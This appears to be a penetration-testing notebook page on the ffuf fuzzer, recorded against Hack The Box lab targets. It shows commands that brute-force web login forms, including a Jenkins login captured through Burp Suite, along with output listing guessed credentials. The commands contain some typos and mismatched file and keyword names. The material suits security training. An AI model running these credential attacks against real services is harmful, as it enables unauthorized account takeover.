FFUF
Last updated
Last updated
root@oco:~$ ffuf -w ./customPWList.txt -u http://94.237.59.180:47925/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"
root@oco:~$ ffuf -w allowed.userlist:USER -w allowed.userlist.passwd:PASS -u http://10.129.1.15/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "Username=USER&Password=PASS" -fr "Warning! Incorrect information."root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL: 10.129.178.161:8080
- Forward requests until the full page is loaded
BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F
Welcome to Jenkins!
Username: null
Password: null
* forward request
BURP > Proxy > BROWSER
Requests
...
POST /j_spring_security_check HTTP/1.1
Host: 10.129.178.161:8080
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.178.161:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.178.161:8080/login?from=%2F
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0
Connection: close
j_username=null&j_password=null&from=%2F&Submit=Sign+in
right-click on the "request" section > copy to file
Filename: requests.txt
File Type: All Files
root@htb:~$ nano requests.txt
...
j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in
* add the {FUZZ} markers to the username/password section
root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password"
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms]
* PFUZZ: root
* UFUZZ: admin
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
* PFUZZ: password1
* UFUZZ: admin
root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
* PFUZZ: admin1
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms]
* PFUZZ: password
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
* PFUZZ: root
* UFUZZ: root
[Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms]
* PFUZZ: password1
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms]
* PFUZZ: admin
* UFUZZ: root
root@htb:~$ root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r -fs 19540
* the -c flag outputs the result in color
* the -r flag follows HTTP redirects during fuzzing
* the -fs flag filters results based on content size
* the -fr flag filters results based on a regex pattern.
* the final result will contain a handful of possible credentials to use